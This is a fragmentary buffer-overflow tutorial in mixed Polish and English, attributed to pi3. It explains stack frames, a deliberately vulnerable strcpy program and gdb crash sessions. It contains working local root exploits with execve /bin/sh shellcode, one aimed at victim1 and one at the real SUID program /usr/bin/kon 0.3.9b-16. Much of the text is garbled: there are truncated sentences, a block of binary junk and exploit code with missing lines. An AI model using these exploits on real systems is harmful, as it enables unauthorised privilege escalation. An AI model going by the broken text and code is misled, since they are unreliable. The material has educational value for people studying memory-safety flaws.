Buffer overflow

by Adam Zabrocki (pi3 - pi3ki31ny@wp.pl) (http://www.pi3.int.pl)


w biblioteczce ANSI funkc


strcpy(), strcat(), sprintf(), vsprintf(), gets(). Niestety

bezpieczne funkcje takie jak fgets(), oraz fgetc() czy getc() i getchar()


jach z rodziny *printf() (syslog() tez).


buffer overflow (BO).

2. Theory


buffer overflow -


strefy stosu. Dwie pierwsze strefy praktycznie nie m


itself is an abstract data type. The stack is of the LIFO (Last In First Out) type.


of the stack. Figure 1 describes the PUSH operation, and figure 2 describes the POP operation.


is called the function epilogue.


Listing 1. prolog.c

void funkcja(int a1, int a2, int a3) {
    char buf1[5];
    char buf2[10];
}

int main() {
    funkcja(1,2,3);
}


# cc -S -o prolog.s prolog.c

# cat prolog.s


pushl $3

pushl $2

pushl $1

call funkcja


- Instruction Pointer). Jest on potrzebny do tego, by procesor podczas, gdy


pushl %ebp

movl %esp,%ebp

subl $20,%esp


the current value of SP is copied into EBP (we will call it SFP), and SP itself is moved by the size


SP is moved by 20 bytes (subl $20,%esp). The stack


rysunku 3.


as we can see in listing 2.

Listing 2. victim1.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char bufor[100];
    if (argv[1]==0) {
        printf("Usage %s <argument>\n",argv[0]);
        exit(-1);
    }
    strcpy(bufor,argv[1]); /* unbounded copy into a 100-byte stack buffer: the overflow discussed in the text */
    return 0;
}


– listing 3.


root@localhost:~# gdb victim1
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) r `perl -e 'print "A"x108'` // the "r" command means "run"
Starting program: /root/victim1 `perl -e 'print "A"x108'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg eip // "info" shows information about what we ask for; "reg" is short for
// registers, and eip is the name of the register we are interested in
eip 0x41414141 0x41414141
(gdb) quit // we leave the program


it equals 0x41414141


A is 65, which means that in hexadecimal it is 0x41


- /bin/sh


the SUID attribute set

*bD%7(‚(e8Dƒ2%X78D:„%…0e8;7VY%5.I@V<)(27J.T{!NN:V†e‡D

&!4&(5&Eb5ˆ{5%7&q%7(-F@^^)(dbI+N:'9(=027C*‰{5sXVY&!X./&!

G

20gP5C7+S(d9(8DCs

.^<?&XyT2%Y:.Te{2T27;OQP‡U>24&>'M2()&4($Y(z./{5!N;N<4%24=PRY:9>?4%?0:.B8

^4z.;e7E&(5sX.T$vB

./{5NN!2%2*Z>5ŠC7+4z1:(2‹0V:.Q!sz%2%&N'(J;(228EPhrŒ(>?4%7&S(+(X4sd5z&1.D45%%(

./{5NN!2%22PC\Ž./&(V.T:>(28D7>(>%&‘05.TD!*z2%7(2>(iV’@5*C+€%({5!S(&V<s“npoqa”*C>2(

S.I&(2$8j5•.T&e./{5!N:N4%2*7Je)V.^')(X&5sU%228@4%72(#^!X4%

.PRS<L+5•07S(VNsb.B?•5$g

!%Š>MQ^†—–Z!&Ive<4+=ZLDY^7.#&Y< &V<P—˜I.I;V<M='j.DM2M^)RY‡

l

*~2Dv7<dC>@P‰\

02:(5!q.Th5b2+(2$5b>(C705v}4V<sb024.,&565&V<b02)fPrŒ(pFMt2+(^)(Y>2(S&!0D./s‰F

przed naszym shellcodem bardz


[ NOP instructions ] [ our shellcode ] [ modified RET ]


0xc0000000


ret=0xc0000000-strlen(shellcode)-strlen(program)-4;


NOP, oraz shellcode, a jako


(listing 4).

Listing 4. exp1.c


#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <getopt.h>

#define PATH "./victim1"

#define BUFS 110 // buffer passed as the argument

#define SHELL 512 // helper buffer

#define NOP 0x90 // NOP instruction

/* our shellcode with 2 extra functions */

unsigned char shellcode[] =

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);

"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0);

"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"

"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";


long ret_ad(char *a1, char *a2) {

return (0xc0000000-strlen(a1)-strlen(a2)-4);

}


int ussage(char *arg) {

printf("\n\t...::: -=[ exploit na program vuln1 ]=- :::...\n");

printf("\n\tUssage:\n\t[+] %s [options]\n -? <this help screen>\n -o <offset>\n -p PATH\n\n",arg);

exit(-1);

}


int main(int argc, char *argv[]) {

/* local helper variables */

long ret,*ret_addr;

char *buf,*buf_addr,*buf_addr2,*path=PATH,*sh;


int i,opt,offset=0;

FILE *fp;

while((opt = getopt(argc,argv,"p:o:?")) != -1) {

switch(opt) {

case 'o':

offset=atoi(optarg); // offset added to the return address

break;

case 'p':

path=optarg; // path to the vuln1 program

break;

case '?':

ussage(argv[0]);

break;

default:

ussage(argv[0]);

break;

}

}

/* Check whether the program exists */

if ( (fp=fopen(path,"r"))==NULL) {

printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);

ussage(argv[0]);

}

/* allocate space for our buffer passed as the argument */

if (!(buf=(char*)malloc(BUFS))) {

printf("\nI can\'t locate memory! - buf\n");

exit(-1);

}

/* allocate space for our helper buffer */

if (!(sh=(char*)malloc(SHELL))) {

printf("\nI can\'t locate memory! - shell\n");

exit(-1);

}

printf("\n\t...::: -=[ exploit na program vuln1 ]=- :::...\n");

printf("\n\t[+] Bulding buffors!\n");


ret_addr=(long*)ret+offset; // add the offset - we add it, we do not subtract it


printf("\t[+] Using adres 0x%x\n",ret_addr);

/* prepare to write the return address */

buf_addr=buf;

buf_addr2=buf_addr;

/* write the return address into the buffer passed as the argument */

while(buf_addr2-buf <= BUFS-5) {

(*(unsigned long*)buf_addr2)=ret_addr;


}


buf_addr2[BUFS-4]='\0';


for(i=0;i<(SHELL);i++)

sh[i]=NOP;


buf_addr = sh + ((SHELL)-strlen(shellcode)-1);


for(i=0;i<strlen(shellcode);i++)

*(buf_addr++) = shellcode[i];


sh[SHELL] = '\0';

printf("\nExecuting the vuln program - %s\n\n",path);

/* run our program, passing our buffer as the argument */

execl(path,path,buf,0);

return 0;

}

Now we compile our exploit and see whether it works:

# chmod +x victim1

$ cc exp1.c -o exp1

$ whoami


user

$ ./exp1

...

# whoami

root

#


3. Real


http://securityfocus.com/advisories/5434


Listing 5. Debugging kon.

root@localhost:~# gdb kon
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...(no debugging symbols found)...
(gdb) r -Coding `perl -e 'print "A"x800'`
Starting program: /usr/bin/kon -Coding `perl -e 'print "A"x800'`
Kanji ON Console ver.0.3.9 (2000/04/09)
KON> video type VGA' selected
KON> hardware scroll mode.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg eip
eip 0x41414141 0x41414141
(gdb) quit

Voila!


Listing 6. exp2.c


#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <getopt.h>

#define PATH "/usr/bin/kon"

#define BUFS 800

/* ...::: -=[ www.pi3.int.pl ]=- :::... */

char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68\x3a"

"\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20\x5d"

"\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69\x68"

"\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68\x3a\x3a"

"\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04\xcd"

"\x80"

/* setuid(0) */

"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"

/* setgid(0) */

"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"

/* exec /bin/sh */

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"

"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"

"\x80"

/* exit(0) */

"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

long ret_ad(char *a1, char *a2) {

return (0xbffffffa-strlen(a1)-strlen(a2));

}

int ussage(char *arg) {

printf("\n\t...::: -=[ exploit for Kon version 0.3.9b-16 (by pi3) ]=- :::...\n");

printf("\n\tUssage:\n\t[+] %s [options]\n -? <this help screen>\n -o <offset>\n -p PATH\n\n",arg);

exit(-1);

}


int main(int argc, char *argv[]) {

long ret,*buf_addr;

char *buf,*path=PATH;

static char *sh[]={shellcode,NULL};

int i,opt,offset=0;

FILE *fp;

while((opt = getopt(argc,argv,"p:o:?")) != -1) {

switch(opt) {

case 'o':

offset=atoi(optarg);

break;

case 'p':

path=optarg;

break;

case '?':

default:

ussage(argv[0]);

break;

}

}

if ( (fp=fopen(path,"r"))==NULL) {

printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);

ussage(argv[0]);

} fclose(fp);

if (!(buf=(char*)malloc(BUFS))) {

printf("\nI can\'t locate memory! - buf\n");

exit(-1);

}

printf("\n\t...::: -=[ exploit for Kon version 0.3.9b-16 (by pi3) ]=- :::...\n");

printf("\n\t[+] Bulding buffors!\n");

ret=ret_ad(shellcode,path);

ret+=offset;

printf("\t[+] Using adres 0x%x\n",ret);

buf_addr=(long*)buf;


for(i=0;i<BUFS;i+=4) {

*(buf_addr) = ret; buf_addr++;

}

printf("\nExecuting the vuln program - %s\n\n",path);

execle(path,path,"-Coding", buf, 0, sh);

return 0;

}


$ whoami

user

$ ls -alh /usr/bin/kon

-rwsr-xr-x 1 root root 45k Jul 5 20:57 /usr/bin/kon*

$ cc exp2.c -o exp2

$ ./exp2

...

KON> video type VGA' selected

KON> hardware scroll mode.

...::: -=[

www.pi3.int.pl

]=- :::…

# whoami

root

#


http://www.securityfocus.com/archive/1/338436

):

int SockPrintf(FILE *sockfp, char *format,...)
{
    va_list ap;
    char buf[32768];

    va_start(ap, format);
    vsprintf(buf, format, ap);
    va_end(ap);
    return SockWrite(buf, 1, strlen(buf), sockfp);
}
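As an added example (not the article's code nor that of the programs it discusses), here are bounded counterparts of the two unsafe patterns shown on this page: the strcpy() into a 100-byte stack buffer in victim1.c and the vsprintf() into a fixed buffer in SockPrintf(). The helper names, the repeated-'A' input modelled on the gdb session above, and the sample format strings are my own constructions.

```c
/* Bounded counterparts of victim1.c's strcpy(bufor, argv[1]) and
 * SockPrintf()'s vsprintf(buf, format, ap). Added example, not the
 * article's code; all helper names and sample inputs are constructed. */
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFOR_SIZE 100   /* same size as victim1.c's local buffer */

/* Bounded replacement for strcpy(): copies src into dst only if it fits
 * together with the terminating NUL. Returns 0 on success, -1 when the
 * input is too long (dst is then left empty instead of overflowing). */
int copy_argument(char *dst, size_t dst_size, const char *src) {
    size_t len = strlen(src);
    if (dst_size == 0 || len >= dst_size) {
        if (dst_size) dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Bounded replacement for vsprintf(): vsnprintf() never writes past
 * buf_size, and its return value tells us whether output was cut off.
 * Returns the formatted length, or -1 if it did not fit (buf left empty). */
int bounded_format(char *buf, size_t buf_size, const char *format, ...) {
    va_list ap;
    int n;
    va_start(ap, format);
    n = vsnprintf(buf, buf_size, format, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= buf_size) {
        if (buf_size) buf[0] = '\0';
        return -1;
    }
    return n;
}

/* Rebuilds the article's test input (perl -e 'print "A"x108') in C:
 * a string of `count` 'A's fed to copy_argument() with a victim1-sized
 * buffer. Returns the copy result (0 = fits, -1 = rejected). */
int copy_repeated_a(size_t count) {
    char bufor[BUFOR_SIZE];
    char *input = malloc(count + 1);
    int rc;
    if (!input) return -1;
    memset(input, 'A', count);
    input[count] = '\0';
    rc = copy_argument(bufor, sizeof bufor, input);
    free(input);
    return rc;
}

/* Formats a constructed message into a small buffer the bounded way;
 * returns the length written or -1 on truncation. */
int format_small(const char *text) {
    char buf[32];
    return bounded_format(buf, sizeof buf, "LINE: %s\n", text);
}

/* victim1.c's main() with the copy bounded: the 108-byte input from the
 * gdb session is rejected instead of overwriting the saved return address. */
int main(int argc, char *argv[]) {
    char bufor[BUFOR_SIZE];
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <argument>\n", argv[0]);
        return 1;
    }
    if (copy_argument(bufor, sizeof bufor, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUFOR_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes safely\n", strlen(bufor));
    return 0;
}
```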


Open Source. Niektóre bugi jednak


gmentation fault, debug the program and write an exploit ;).


http://securityfocus.com/archive/1


on the packetstorm site (http://www.packetstormsecurity.nl).

5. Bibliography

http://phrack.org/show.php?p=49&a=14

http://www.pi3.int.pl

